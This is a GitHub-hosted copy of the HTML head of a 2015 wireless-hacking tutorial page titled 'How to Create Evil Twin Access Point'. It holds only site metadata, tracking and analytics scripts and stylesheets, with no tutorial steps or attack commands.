-
Notifications
You must be signed in to change notification settings - Fork 0
/
How to Create Evil Twin Access Point.html
585 lines (558 loc) · 77.2 KB
/
How to Create Evil Twin Access Point.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
<!DOCTYPE html>
<html lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8"><script async="" src="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/popover.js"></script>
<title>How to Create Evil Twin Access Point ?</title>
<meta charset="UTF-8">
<meta name="robots" content="noodp,noydir">
<meta name="viewport" content="width=device-width, initial-scale=1">
<!-- Jetpack Site Verification Tags -->
<meta name="google-site-verification" content="CHol3zSNWSMImNlZAFkoDI3BiwAairPSlCtF4LItRvg">
<link rel="dns-prefetch" href="https://s0.wp.com/">
<link rel="dns-prefetch" href="https://cdnjs.cloudflare.com/">
<link rel="dns-prefetch" href="https://fonts.googleapis.com/">
<link rel="dns-prefetch" href="https://s.w.org/">
<link rel="alternate" type="application/rss+xml" title="Learn Ethical Hacking and Penetration Testing Online » Feed" href="https://www.hackingloops.com/feed/">
<link rel="alternate" type="application/rss+xml" title="Learn Ethical Hacking and Penetration Testing Online » Comments Feed" href="https://www.hackingloops.com/comments/feed/">
<link rel="alternate" type="application/rss+xml" title="Learn Ethical Hacking and Penetration Testing Online » How to Create Evil Twin Access Point ? Comments Feed" href="https://www.hackingloops.com/create-evil-twin-access-point/feed/">
<!-- Squirrly SEO Plugin 6.2.8, visit: http://plugin.squirrly.co/ -->
<meta name="description" content="How to create Evil twin access point? But first of all what is Evil twin access point?? An evil twin, in security, is a rogue wireless access point that masquerades as">
<meta name="keywords" content="creating evil twin access point,evil twin access point,hacking school,hacking wifi,hacking wireless routers,tutorial,tutorials">
<link rel="canonical" href="https://www.hackingloops.com/create-evil-twin-access-point/">
<link rel="alternate" type="application/rss+xml" title="How to Create Evil Twin Access Point ?" href="https://www.hackingloops.com/sitemap.xml">
<link rel="shortcut icon" href="https://www.hackingloops.com/favicon.icon">
<link rel="apple-touch-icon" href="https://www.hackingloops.com/touch-icon.png">
<link rel="apple-touch-icon" sizes="76x76" href="https://www.hackingloops.com/touch-icon76.png">
<link rel="apple-touch-icon" sizes="120x120" href="https://www.hackingloops.com/touch-icon120.png">
<link rel="apple-touch-icon" sizes="152x152" href="https://www.hackingloops.com/touch-icon152.png">
<meta name="dc.language" content="en">
<meta name="dcterms.rightsHolder" content="Vanshit">
<meta name="dc.publisher" content="Vanshit">
<meta name="dc.title" content="How to Create Evil Twin Access Point ?">
<meta name="dc.description" content="How to create Evil twin access point? But first of all what is Evil twin access point?? An evil twin, in security, is a rogue wireless access point that masquerades as">
<meta name="dc.date.issued" content="2015-10-11">
<meta property="og:url" content="https://www.hackingloops.com/create-evil-twin-access-point/">
<meta property="og:image" content="https://www.hackingloops.com/wp-content/uploads/2015/01/how_to_hack_wifi.jpg">
<meta property="og:image:width" content="363">
<meta property="og:image:height" content="331">
<meta property="og:title" content="How to Create Evil Twin Access Point ?">
<meta property="og:description" content="How to create Evil twin access point? But first of all what is Evil twin access point?? An evil twin, in security, is a rogue wireless access point that masquerades as">
<meta property="og:site_name" content="Learn Ethical Hacking and Penetration Testing Online">
<meta property="og:locale" content="en_US">
<meta property="og:type" content="article">
<meta property="article:published_time" content="2015-10-11T12:47:05+00:00">
<meta property="article:section" content="Network Penetration Testing">
<meta property="article:tag" content="creating evil twin access point">
<meta property="article:tag" content="evil twin access point">
<meta property="article:tag" content="hacking school">
<meta property="article:tag" content="hacking wifi">
<meta property="article:tag" content="hacking wireless routers">
<meta property="article:tag" content="tutorial">
<meta property="article:tag" content="tutorials">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:creator" content="@hackingloops">
<meta name="twitter:site" content="@hackingloops">
<meta name="twitter:url" content="https://www.hackingloops.com/create-evil-twin-access-point/">
<meta name="twitter:title" content="How to Create Evil Twin Access Point ?">
<meta name="twitter:description" content="How to create Evil twin access point? But first of all what is Evil twin access point?? An evil twin, in security, is a rogue wireless access point that masquerades as | Learn Ethical Hacking and Penetration Testing Online">
<meta name="twitter:image" content="https://www.hackingloops.com/wp-content/uploads/2015/01/how_to_hack_wifi.jpg">
<meta name="twitter:domain" content="Learn Ethical Hacking and Penetration Testing Online">
<script async="" src="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/analytics.js"></script><script src="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/355230904809711.js" async=""></script><script async="" src="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/fbevents.js"></script><script>
!function(f,b,e,v,n,t,s){if(f.fbq)return;n=f.fbq=function(){n.callMethod?
n.callMethod.apply(n,arguments):n.queue.push(arguments)};if(!f._fbq)f._fbq=n;
n.push=n;n.loaded=!0;n.version='2.0';n.queue=[];t=b.createElement(e);t.async=!0;
t.src=v;s=b.getElementsByTagName(e)[0];s.parentNode.insertBefore(t,s)}(window,
document,'script','https://connect.facebook.net/en_US/fbevents.js');
fbq('init', '355230904809711');
fbq('track', 'ViewContent');
fbq('track', 'PageView');</script>
<noscript><img height='1' width='1' style='display:none'
src='https://www.facebook.com/tr?id=355230904809711&ev=PageView&noscript=1'
/></noscript>
<script type="application/ld+json">
{ "@context": "http://schema.org",
"@type": "Article",
"name": "How to Create Evil Twin Access Point ?",
"headline": "How to create Evil twin access point? But first of all what is Evil twin access point?? An evil twin, in security, is a rogue wireless access point that masquerades as",
"url": "https://www.hackingloops.com/create-evil-twin-access-point/",
"mainEntityOfPage": { "@type": "WebPage", "url": "https://www.hackingloops.com/create-evil-twin-access-point/" },
"thumbnailUrl": "https://www.hackingloops.com/wp-content/uploads/2015/01/how_to_hack_wifi.jpg",
"datePublished": "2015-10-11T12:47:05+00:00",
"dateModified": "2015-10-11T12:47:05+00:00",
"image": {
"@type": "ImageObject",
"url": "https://www.hackingloops.com/wp-content/uploads/2015/01/how_to_hack_wifi.jpg",
"height": 331,
"width": 363
},
"author": {"@type": "Person", "url": "https://www.hackingloops.com/author/vanshit/", "name": "Vanshit"},
"publisher": {"@type":"Organization",
"url": "https://www.hackingloops.com/create-evil-twin-access-point/",
"name":"Hackingloops",
"logo":{"@type": "ImageObject","url": "http://www.hackingloops.com/wp-content/uploads/2015/04/[email protected]"},
"description":"Learn ethical hacking, penetration testing, cyber security, best security and web penetration testing techniques from best ethical hackers in security field."},
"keywords": ["creating evil twin access point","evil twin access point","hacking school","hacking wifi","hacking wireless routers","tutorial"]}
</script>
<!-- /Squirrly SEO Plugin -->
<link rel="stylesheet" id="sq_frontend.css-css" href="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/sq_frontend.css" type="text/css" media="all">
<script type="text/javascript">
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.hackingloops.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=f127a610495a0e104bc41050c3fac71f"}};
!function(a,b,c){function d(a){var b,c,d,e,f=String.fromCharCode;if(!k||!k.fillText)return!1;switch(k.clearRect(0,0,j.width,j.height),k.textBaseline="top",k.font="600 32px Arial",a){case"flag":return k.fillText(f(55356,56826,55356,56819),0,0),!(j.toDataURL().length<3e3)&&(k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57331,65039,8205,55356,57096),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57331,55356,57096),0,0),c=j.toDataURL(),b!==c);case"emoji4":return k.fillText(f(55357,56425,55356,57341,8205,55357,56507),0,0),d=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55357,56425,55356,57341,55357,56507),0,0),e=j.toDataURL(),d!==e}return!1}function e(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g,h,i,j=b.createElement("canvas"),k=j.getContext&&j.getContext("2d");for(i=Array("flag","emoji4"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings);
</script><script src="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/wp-emoji-release.js" type="text/javascript" defer="defer"></script>
<style type="text/css">
img.wp-smiley,
img.emoji {
display: inline !important;
border: none !important;
box-shadow: none !important;
height: 1em !important;
width: 1em !important;
margin: 0 .07em !important;
vertical-align: -0.1em !important;
background: none !important;
padding: 0 !important;
}
</style>
<link rel="stylesheet" id="pmpro_frontend-css" href="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/frontend.css" type="text/css" media="screen">
<link rel="stylesheet" id="pmpro_print-css" href="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/print.css" type="text/css" media="print">
<link rel="stylesheet" id="wpcw-frontend-css" href="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/wpcw_frontend.css" type="text/css" media="all">
<link rel="stylesheet" id="flex-theme-css" href="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/style.css" type="text/css" media="all">
<link rel="stylesheet" id="apss-font-awesome-css" href="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/font-awesome.css" type="text/css" media="all">
<link rel="stylesheet" id="apss-font-opensans-css" href="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/css.css" type="text/css" media="all">
<link rel="stylesheet" id="apss-frontend-css-css" href="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/frontend_002.css" type="text/css" media="all">
<link rel="stylesheet" id="dashicons-css" href="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/dashicons.css" type="text/css" media="all">
<link rel="stylesheet" id="flex-google-fonts-css" href="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/css_002.css" type="text/css" media="all">
<link rel="stylesheet" id="jetpack_css-css" href="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/jetpack.css" type="text/css" media="all">
<script type="text/javascript" src="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/jquery_004.js"></script>
<script type="text/javascript" src="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/jquery-migrate.js"></script>
<script type="text/javascript" src="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/jquery_002.js"></script>
<script type="text/javascript" src="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/jquery.js"></script>
<script type="text/javascript" src="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/jquery_003.js"></script>
<script type="text/javascript">
/* <![CDATA[ */
var wpcw_js_consts_fe = {"ajaxurl":"https:\/\/www.hackingloops.com\/wp-admin\/admin-ajax.php","enrollment_nonce":"8307358b90","progress_nonce":"53d8719901","str_uploading":"Uploading:","str_quiz_all_fields":"Please provide an answer for all of the questions on this page.","timer_units_hrs":"hrs","timer_units_mins":"mins","timer_units_secs":"secs"};
/* ]]> */
</script>
<script type="text/javascript" src="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/wpcw_front.js"></script>
<!--[if lt IE 9]>
<script type='text/javascript' src='https://www.hackingloops.com/wp-content/themes/genesis/lib/js/html5shiv.min.js?ver=3.7.3'></script>
<![endif]-->
<script type="text/javascript" src="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/smoothscrolling.js"></script>
<script type="text/javascript">
/* <![CDATA[ */
var WP = {"AJAX_URL":"https:\/\/www.hackingloops.com\/wp-admin\/admin-ajax.php","NONCE":"328e2430d4"};
/* ]]> */
</script>
<script type="text/javascript" src="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/global.js"></script>
<link rel="https://api.w.org/" href="https://www.hackingloops.com/wp-json/">
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.hackingloops.com/xmlrpc.php?rsd">
<link rel="alternate" type="application/json+oembed" href="https://www.hackingloops.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.hackingloops.com%2Fcreate-evil-twin-access-point%2F">
<link rel="alternate" type="text/xml+oembed" href="https://www.hackingloops.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.hackingloops.com%2Fcreate-evil-twin-access-point%2F&format=xml">
<style type="text/css">
#category-posts-4-internal .cat-post-item span.cat-post-css-cropping img {max-width: initial; max-height: initial;}
#category-posts-4-internal .cat-post-title {display: inline-block; font-size: 15px;}
#category-posts-4-internal .cat-post-current .cat-post-title {font-weight: bold; text-transform: uppercase;}.cat-post-date {font-size: 12px; line-height: 18px; font-style: italic; margin-bottom: 10px;}
#category-posts-4-internal .cat-post-comment-num {font-size: 12px; line-height: 18px;}
#category-posts-4-internal .cat-post-author {margin-bottom: 0;}
#category-posts-4-internal .cat-post-thumbnail {display: block;}
#category-posts-4-internal .cat-post-thumbnail img {margin: 5px 10px 5px 0;}
#category-posts-4-internal .cat-post-item:before {content: ""; display: table; clear: both;}
#category-posts-4-internal .cat-post-item:after {content: ""; display: table; clear: both;}
#category-posts-4-internal .cat-post-item .cat-post-css-cropping span {margin: 5px 10px 5px 0; overflow: hidden; display:inline-block}
#category-posts-4-internal .cat-post-item .cat-post-css-cropping img {margin: initial;}
#category-posts-4-internal .cat-post-white img {padding-bottom: 0 !important; -webkit-transition: all 0.3s ease; -moz-transition: all 0.3s ease; -ms-transition: all 0.3s ease; -o-transition: all 0.3s ease; transition: all 0.3s ease;}
#category-posts-4-internal .cat-post-dark img {padding-bottom: 0 !important; -webkit-transition: all 0.3s ease; -moz-transition: all 0.3s ease; -ms-transition: all 0.3s ease; -o-transition: all 0.3s ease; transition: all 0.3s ease;}
#category-posts-4-internal .cat-post-scale img {padding-bottom: 0 !important; -webkit-transition: all 0.3s ease; -moz-transition: all 0.3s ease; -ms-transition: all 0.3s ease; -o-transition: all 0.3s ease; transition: all 0.3s ease;}
#category-posts-4-internal .cat-post-blur img {padding-bottom: 0 !important; -webkit-transition: all 0.3s ease; -moz-transition: all 0.3s ease; -ms-transition: all 0.3s ease; -o-transition: all 0.3s ease; transition: all 0.3s ease;}
#category-posts-4-internal .cat-post-white {background-color: white;}
#category-posts-4-internal .cat-post-white img:hover {opacity: 0.8;}
#category-posts-4-internal .cat-post-dark img:hover {-webkit-filter: brightness(75%); -moz-filter: brightness(75%); -ms-filter: brightness(75%); -o-filter: brightness(75%); filter: brightness(75%);}
#category-posts-4-internal .cat-post-scale span {overflow: hidden; margin: 5px 10px 5px 0;}
#category-posts-4-internal .cat-post-scale img {margin: initial; -webkit-transition: all 0.3s ease; -moz-transition: all 0.3s ease; -ms-transition: all 0.3s ease; -o-transition: all 0.3s ease; transition: all 0.3s ease;}
#category-posts-4-internal .cat-post-scale img:hover {-webkit-transform: scale(1.1, 1.1); -ms-transform: scale(1.1, 1.1); transform: scale(1.1, 1.1);}
#category-posts-4-internal .cat-post-blur img:hover {-webkit-filter: blur(2px); -moz-filter: blur(2px); -o-filter: blur(2px); -ms-filter: blur(2px); filter: blur(2px);}
#category-posts-4-internal .cat-post-item {border-bottom: 1px solid #ccc; list-style: none; list-style-type: none; margin: 3px 0; padding: 3px 0;}
#category-posts-4-internal .cat-post-item:last-child {border-bottom: none;}
#category-posts-4-internal .cat-post-thumbnail {float:left;}
#category-posts-2-internal .cat-post-item span.cat-post-css-cropping img {max-width: initial; max-height: initial;}
#category-posts-2-internal .cat-post-title {display: inline-block; font-size: 15px;}
#category-posts-2-internal .cat-post-current .cat-post-title {font-weight: bold; text-transform: uppercase;}.cat-post-date {font-size: 12px; line-height: 18px; font-style: italic; margin-bottom: 10px;}
#category-posts-2-internal .cat-post-comment-num {font-size: 12px; line-height: 18px;}
#category-posts-2-internal .cat-post-author {margin-bottom: 0;}
#category-posts-2-internal .cat-post-thumbnail {display: block;}
#category-posts-2-internal .cat-post-thumbnail img {margin: 5px 10px 5px 0;}
#category-posts-2-internal .cat-post-item:before {content: ""; display: table; clear: both;}
#category-posts-2-internal .cat-post-item:after {content: ""; display: table; clear: both;}
#category-posts-2-internal .cat-post-item .cat-post-css-cropping span {margin: 5px 10px 5px 0; overflow: hidden; display:inline-block}
#category-posts-2-internal .cat-post-item .cat-post-css-cropping img {margin: initial;}
#category-posts-2-internal .cat-post-white img {padding-bottom: 0 !important; -webkit-transition: all 0.3s ease; -moz-transition: all 0.3s ease; -ms-transition: all 0.3s ease; -o-transition: all 0.3s ease; transition: all 0.3s ease;}
#category-posts-2-internal .cat-post-dark img {padding-bottom: 0 !important; -webkit-transition: all 0.3s ease; -moz-transition: all 0.3s ease; -ms-transition: all 0.3s ease; -o-transition: all 0.3s ease; transition: all 0.3s ease;}
#category-posts-2-internal .cat-post-scale img {padding-bottom: 0 !important; -webkit-transition: all 0.3s ease; -moz-transition: all 0.3s ease; -ms-transition: all 0.3s ease; -o-transition: all 0.3s ease; transition: all 0.3s ease;}
#category-posts-2-internal .cat-post-blur img {padding-bottom: 0 !important; -webkit-transition: all 0.3s ease; -moz-transition: all 0.3s ease; -ms-transition: all 0.3s ease; -o-transition: all 0.3s ease; transition: all 0.3s ease;}
#category-posts-2-internal .cat-post-white {background-color: white;}
#category-posts-2-internal .cat-post-white img:hover {opacity: 0.8;}
#category-posts-2-internal .cat-post-dark img:hover {-webkit-filter: brightness(75%); -moz-filter: brightness(75%); -ms-filter: brightness(75%); -o-filter: brightness(75%); filter: brightness(75%);}
#category-posts-2-internal .cat-post-scale span {overflow: hidden; margin: 5px 10px 5px 0;}
#category-posts-2-internal .cat-post-scale img {margin: initial; -webkit-transition: all 0.3s ease; -moz-transition: all 0.3s ease; -ms-transition: all 0.3s ease; -o-transition: all 0.3s ease; transition: all 0.3s ease;}
#category-posts-2-internal .cat-post-scale img:hover {-webkit-transform: scale(1.1, 1.1); -ms-transform: scale(1.1, 1.1); transform: scale(1.1, 1.1);}
#category-posts-2-internal .cat-post-blur img:hover {-webkit-filter: blur(2px); -moz-filter: blur(2px); -o-filter: blur(2px); -ms-filter: blur(2px); filter: blur(2px);}
#category-posts-2-internal .cat-post-item {border-bottom: 1px solid #ccc; list-style: none; list-style-type: none; margin: 3px 0; padding: 3px 0;}
#category-posts-2-internal .cat-post-item:last-child {border-bottom: none;}
#category-posts-2-internal .cat-post-thumbnail {float:left;}
#category-posts-5-internal .cat-post-item span.cat-post-css-cropping img {max-width: initial; max-height: initial;}
#category-posts-5-internal .cat-post-title {display: inline-block; font-size: 15px;}
#category-posts-5-internal .cat-post-current .cat-post-title {font-weight: bold; text-transform: uppercase;}.cat-post-date {font-size: 12px; line-height: 18px; font-style: italic; margin-bottom: 10px;}
#category-posts-5-internal .cat-post-comment-num {font-size: 12px; line-height: 18px;}
#category-posts-5-internal .cat-post-author {margin-bottom: 0;}
#category-posts-5-internal .cat-post-thumbnail {display: block;}
#category-posts-5-internal .cat-post-thumbnail img {margin: 5px 10px 5px 0;}
#category-posts-5-internal .cat-post-item:before {content: ""; display: table; clear: both;}
#category-posts-5-internal .cat-post-item:after {content: ""; display: table; clear: both;}
#category-posts-5-internal .cat-post-item .cat-post-css-cropping span {margin: 5px 10px 5px 0; overflow: hidden; display:inline-block}
#category-posts-5-internal .cat-post-item .cat-post-css-cropping img {margin: initial;}
#category-posts-5-internal .cat-post-white img {padding-bottom: 0 !important; -webkit-transition: all 0.3s ease; -moz-transition: all 0.3s ease; -ms-transition: all 0.3s ease; -o-transition: all 0.3s ease; transition: all 0.3s ease;}
#category-posts-5-internal .cat-post-dark img {padding-bottom: 0 !important; -webkit-transition: all 0.3s ease; -moz-transition: all 0.3s ease; -ms-transition: all 0.3s ease; -o-transition: all 0.3s ease; transition: all 0.3s ease;}
#category-posts-5-internal .cat-post-scale img {padding-bottom: 0 !important; -webkit-transition: all 0.3s ease; -moz-transition: all 0.3s ease; -ms-transition: all 0.3s ease; -o-transition: all 0.3s ease; transition: all 0.3s ease;}
#category-posts-5-internal .cat-post-blur img {padding-bottom: 0 !important; -webkit-transition: all 0.3s ease; -moz-transition: all 0.3s ease; -ms-transition: all 0.3s ease; -o-transition: all 0.3s ease; transition: all 0.3s ease;}
#category-posts-5-internal .cat-post-white {background-color: white;}
#category-posts-5-internal .cat-post-white img:hover {opacity: 0.8;}
#category-posts-5-internal .cat-post-dark img:hover {-webkit-filter: brightness(75%); -moz-filter: brightness(75%); -ms-filter: brightness(75%); -o-filter: brightness(75%); filter: brightness(75%);}
#category-posts-5-internal .cat-post-scale span {overflow: hidden; margin: 5px 10px 5px 0;}
#category-posts-5-internal .cat-post-scale img {margin: initial; -webkit-transition: all 0.3s ease; -moz-transition: all 0.3s ease; -ms-transition: all 0.3s ease; -o-transition: all 0.3s ease; transition: all 0.3s ease;}
#category-posts-5-internal .cat-post-scale img:hover {-webkit-transform: scale(1.1, 1.1); -ms-transform: scale(1.1, 1.1); transform: scale(1.1, 1.1);}
#category-posts-5-internal .cat-post-blur img:hover {-webkit-filter: blur(2px); -moz-filter: blur(2px); -o-filter: blur(2px); -ms-filter: blur(2px); filter: blur(2px);}
#category-posts-5-internal .cat-post-item {border-bottom: 1px solid #ccc; list-style: none; list-style-type: none; margin: 3px 0; padding: 3px 0;}
#category-posts-5-internal .cat-post-item:last-child {border-bottom: none;}
#category-posts-5-internal .cat-post-thumbnail {float:left;}
</style>
<script type="text/javascript" data-cfasync="false">var _mmunch = {'front': false, 'page': false, 'post': false, 'category': false, 'author': false, 'search': false, 'attachment': false, 'tag': false};_mmunch['post'] = true; _mmunch['postData'] = {"ID":4219,"post_name":"create-evil-twin-access-point","post_title":"How to Create Evil Twin Access Point ?","post_type":"post","post_author":"18608","post_status":"publish"}; _mmunch['postCategories'] = [{"term_id":838,"name":"Network Penetration Testing","slug":"network-penetration-testing","term_group":0,"term_taxonomy_id":838,"taxonomy":"category","description":"Hackingloops offers best network security penetration testing tutorials for network administrators to learn how to perform network pen testing with ease.","parent":0,"count":28,"filter":"raw","meta":[],"cat_ID":838,"category_count":28,"category_description":"Hackingloops offers best network security penetration testing tutorials for network administrators to learn how to perform network pen testing with ease.","cat_name":"Network Penetration Testing","category_nicename":"network-penetration-testing","category_parent":0},{"term_id":81,"name":"Penetration Testing","slug":"penetration-testing","term_group":0,"term_taxonomy_id":81,"taxonomy":"category","description":"Hackingloops provides free penetration testing tutorials for security researchers or penetration testers to learn and perform effective pen tests.","parent":0,"count":125,"filter":"raw","meta":[],"cat_ID":81,"category_count":125,"category_description":"Hackingloops provides free penetration testing tutorials for security researchers or penetration testers to learn and perform effective pen tests.","cat_name":"Penetration Testing","category_nicename":"penetration-testing","category_parent":0},{"term_id":52,"name":"Wireless Hacking","slug":"wireless-hacking","term_group":0,"term_taxonomy_id":52,"taxonomy":"category","description":"Learn how hackers can hack wireless networks or your wifi routers with step by step hacker guides and learn how to protect your wireless or wifi routers from getting hacked.","parent":0,"count":28,"filter":"raw","meta":[],"cat_ID":52,"category_count":28,"category_description":"Learn how hackers can hack wireless networks or your wifi routers with step by step hacker guides and learn how to protect your wireless or wifi routers from getting hacked.","cat_name":"Wireless Hacking","category_nicename":"wireless-hacking","category_parent":0},{"term_id":839,"name":"Wireless Penetration Testing","slug":"wireless-pen-testing","term_group":0,"term_taxonomy_id":839,"taxonomy":"category","description":"Learn how to perform wireless penetration testing and how to prepare wireless pen tests for ensuring wireless security and prevent network intrusion on Hackingloops.","parent":0,"count":18,"filter":"raw","meta":[],"cat_ID":839,"category_count":18,"category_description":"Learn how to perform wireless penetration testing and how to prepare wireless pen tests for ensuring wireless security and prevent network intrusion on Hackingloops.","cat_name":"Wireless Penetration Testing","category_nicename":"wireless-pen-testing","category_parent":0}]; _mmunch['postTags'] = [{"term_id":349,"name":"Creating Evil Twin Access Point","slug":"creating-evil-twin-access-point","term_group":0,"term_taxonomy_id":349,"taxonomy":"post_tag","description":"","parent":0,"count":1,"filter":"raw","meta":[]},{"term_id":348,"name":"Evil Twin Access Point","slug":"evil-twin-access-point","term_group":0,"term_taxonomy_id":348,"taxonomy":"post_tag","description":"","parent":0,"count":1,"filter":"raw","meta":[]},{"term_id":7,"name":"Hacking School","slug":"hacking-class","term_group":0,"term_taxonomy_id":7,"taxonomy":"post_tag","description":"","parent":0,"count":128,"filter":"raw","meta":[]},{"term_id":351,"name":"Hacking Wifi","slug":"hacking-wifi","term_group":0,"term_taxonomy_id":351,"taxonomy":"post_tag","description":"","parent":0,"count":2,"filter":"raw","meta":[]},{"term_id":350,"name":"Hacking Wireless Routers","slug":"hacking-wireless-routers","term_group":0,"term_taxonomy_id":350,"taxonomy":"post_tag","description":"","parent":0,"count":1,"filter":"raw","meta":[]},{"term_id":10,"name":"Tutorial","slug":"tutorial","term_group":0,"term_taxonomy_id":10,"taxonomy":"post_tag","description":"","parent":0,"count":95,"filter":"raw","meta":[]},{"term_id":12,"name":"Tutorials","slug":"tutorials","term_group":0,"term_taxonomy_id":12,"taxonomy":"post_tag","description":"","parent":0,"count":109,"filter":"raw","meta":[]}]; _mmunch['postAuthor'] = {"name":"","ID":""};</script><script data-cfasync="false" src="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/site.js" id="mailmunch-script" data-plugin="mailmunch" data-mailmunch-site-id="248782" async=""></script>
<link rel="dns-prefetch" href="https://v0.wordpress.com/">
<style type="text/css">img#wpstats{display:none}</style><script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-79080102-1', 'auto');
ga('send', 'pageview');
</script><style>body { background-color: #ffffff; }</style>
<style type="text/css">body.custom-background { background-image: url('https://www.hackingloops.com/wp-content/uploads/2016/06/body-bg-1.png'); background-repeat: repeat; background-position: top left; background-attachment: ; }</style>
<link rel="icon" href="https://www.hackingloops.com/wp-content/uploads/2015/04/cropped-HackingLoops-Logo-32x32.jpg" sizes="32x32">
<link rel="icon" href="https://www.hackingloops.com/wp-content/uploads/2015/04/cropped-HackingLoops-Logo-192x192.jpg" sizes="192x192">
<link rel="apple-touch-icon-precomposed" href="https://www.hackingloops.com/wp-content/uploads/2015/04/cropped-HackingLoops-Logo-180x180.jpg">
<meta name="msapplication-TileImage" content="https://www.hackingloops.com/wp-content/uploads/2015/04/cropped-HackingLoops-Logo-270x270.jpg">
<link rel="stylesheet" type="text/css" href="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/styles.css"></head>
